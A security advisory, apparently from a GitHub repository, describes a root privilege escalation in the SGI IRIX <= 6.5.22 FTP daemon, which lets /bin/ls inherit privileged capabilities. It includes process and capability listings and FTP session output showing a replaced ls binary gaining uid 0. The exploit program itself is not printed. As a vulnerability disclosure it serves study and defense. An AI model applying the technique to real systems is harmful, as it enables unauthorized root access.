-
Notifications
You must be signed in to change notification settings - Fork 109
/
Copy pathirix-ftpd-ls.txt
54 lines (48 loc) · 2.9 KB
/
irix-ftpd-ls.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
SGI IRIX <= 6.5.22 ftpd "/bin/ls" root privilege escalation
===========================================================
The default FTP daemon enabled in IRIX does not drop capabilities when
calling external binaries. The application calls the "/bin/ls" (a symlink
to /sbin/ls on default systems) as a privileged process and the child
process then inherits the parent capabilities. An attacker who can
change the "/sbin/ls" binary can trivially obtain root permissions by
exploiting capability inheritence under SGI IRIX.
An example here shows that the ftpd service has been authenticated by
the "demos" user and a popen() (note: non-exploitable) call is used to
execute the "/bin/ls" binary when requesting directory listings, such
as with a call to the FTP LIST command.
root@indiegogo j:0 h:581 (21:39)[ /usr/demos/hacker/ ] # ps -aef | grep ftpd
demos 1490 247 0 21:34:39 ? 0:01 ftpd -l
root 1549 1346 0 21:39:16 pts/0 0:00 grep ftpd
root@indiegogo j:0 h:582 (21:39)[ /usr/demos/hacker/ ] # ps -aef | grep ls
demos 1540 1490 0 21:38:47 ? 0:12 /bin/ls -lA -R /
root 1551 1346 0 21:39:19 pts/0 0:00 grep ls
root@indiegogo j:0 h:583 (21:39)[ /usr/demos/hacker/ ] # ls -alP /proc/0000001540
-rw------- 1 demos demos 2068480 Mar 27 21:38 /proc/0000001540
[all= CAP_DAC_WRITE+pi CAP_SETGID+pi CAP_SETUID+pi CAP_AUDIT_WRITE+pi CAP_PRIV_PORT+pi CAP_CHROOT+pi]
The process list above shows that the "/bin/ls" process is running under the
"demos" low privileged user account, however review of the process capabilities
shows that this binary has inherited several privileged capabilities including
the desirable CAP_SETUID+pi capability that would allow the process to obtain
root permissions. By using our irix-captest.c (modified to directly request the
above permissions mask shown above) to replace the "/bin/ls" binary, it is
possible for the user to run commands with elevated privileges. An example
of exploitation can be seen in the following FTP client output.
lftp [email protected]:/tmp> ls -alR ./
req effective capabilities 10080800c04
req permitted capabilities 10080800c04
req inheritable caps 10080800c04
set capabilities result 0
effective capabilities 10080800c04
permitted capabilities 10080800c04
inheritable capabilities 10080800c04
cap_to_text() = all= CAP_DAC_WRITE+pi CAP_SETGID+pi CAP_SETUID+pi CAP_AUDIT_WRITE+pi CAP_PRIV_PORT+pi CAP_CHROOT+pi
uid=0(root) gid=0(sys)
lftp [email protected]:/tmp>
Note: as an attacker must be able to control the "/sbin/ls" or the system default
be changed to exploit this issue, an additional vulnerability is required to overwrite
the "/bin/ls" binary for most attackers. The child process does not need to request
capabilities and a call directly to setuid() / setgid() will succeed in most cases
due to the inheritence issue described above.
Happy Hacking!
-- Hacker Fantastic
(https://hacker.house)